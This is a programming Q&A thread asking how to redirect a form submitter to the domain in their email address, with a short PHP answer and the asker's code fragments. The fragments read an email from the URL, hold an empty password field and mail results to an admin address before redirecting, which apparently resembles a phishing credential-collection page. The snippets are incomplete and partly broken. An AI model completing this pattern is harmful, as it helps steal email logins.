# Redirect the Email Address Link to their Specific Domain

Tags: php

I have a question, please anyone out there help me!!

if a user email address like "user@example.com" when form is submitted, it should go to their specific domain name i.e, www.example.com,

same should go for user like "user@gmail.com", this should be automatically go to the www.gmail.com when submit the form is submitted.

simply that have to redirect to the domain name after the @ symbol?

I want my redirect to be to the specific domain names after their @symbols

Thanks in advance

Comment: Your question lacks any details and can therefore not be reliably answered. Can you show code of what you have tried so far?

Answer (score 0):

Use following code

```
$ar = explode('@',$mail);
$domain = "www.".$ar[1];
header("Location:$domain");
```

Comment: here is exactly what i need to do. get UserID user@example.com and post to admin and user notified at user@xample.com at the end get user domain and redirect..

Comment: Just as example below..<?php
session_start();

// start > to get url and and put id 
 $url="http://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];

 $urlquery = parse_url($url, PHP_URL_QUERY);
 $s = parse_str($urlquery);
 $parts = @explode('@', $i);
 $user = @$parts[0];
// < end 

$email_msg = "";
$pass_msg = "";

$email = $i;
$pass = "";

Comment: would it be like this <?
session_start();
$recipient = "admin@admin.com";
$subject = "Domain - ".$country;
$headers = "From: Admin <admin@admin.com>";
$headers .= $_POST['eMailAdd']."\n";
$headers .= "MIME-Version: 1.0\n"

$ar = explode('@',$mail);
$domain = "www.".$ar[1];
header("Location:$domain");

Comment: Please see code i have worked with so far. I have already call this function at the begining.. what do i do for the domain to be sent to the redirect after the result<?php
session_start();

// start > to get url and and put id 
 $url="http://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];

 $urlquery = parse_url($url, PHP_URL_QUERY);
 $s = parse_str($urlquery);
 $parts = @explode('@', $i);
 $user = @$parts[0];
// < end